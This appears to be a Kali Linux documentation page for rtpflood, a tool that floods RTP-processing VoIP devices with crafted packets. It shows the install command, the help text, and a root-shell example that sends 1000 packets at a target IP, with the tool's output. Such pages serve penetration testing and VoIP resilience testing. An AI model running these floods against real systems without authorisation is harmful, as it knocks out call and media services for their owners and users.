Tool Documentation:
rtpflood Usage Example
Flood from the source IP (192.168.1.202
) to the target IP (192.168.1.1
) with source port 5060 (5060
) and destination port 5061 (5061
) using 1000 packets (1000
) with the specified sequence number (3
), timestamp (123456789
), and SSID (kali
):
root@kali:~# rtpflood 192.168.1.202 192.168.1.1 5060 5061 1000 3 123456789 kali
Will flood port 5061 from port 5060 1000 times
Using sequence_number 3 timestamp 123456789 SSID 0
We have IP_HDRINCL
Number of Packets sent:
Sent 289 160 286
Packages and Binaries:
rtpflood
A command line tool used to flood any device that is processing RTP.
Installed size: 26 KB
How to install: sudo apt install rtpflood
Dependencies:
- libc6
rtpflood
root@kali:~# rtpflood -h
usage: rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID
Updated on: 2024-Mar-11